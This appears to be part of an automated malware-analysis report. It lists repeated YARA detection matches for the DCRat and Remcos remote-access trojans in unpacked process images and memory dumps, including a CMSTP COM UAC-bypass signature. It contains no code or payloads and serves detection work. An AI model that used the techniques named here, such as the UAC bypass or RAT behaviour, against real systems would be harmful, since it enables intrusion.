        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
        Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
        Source: 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
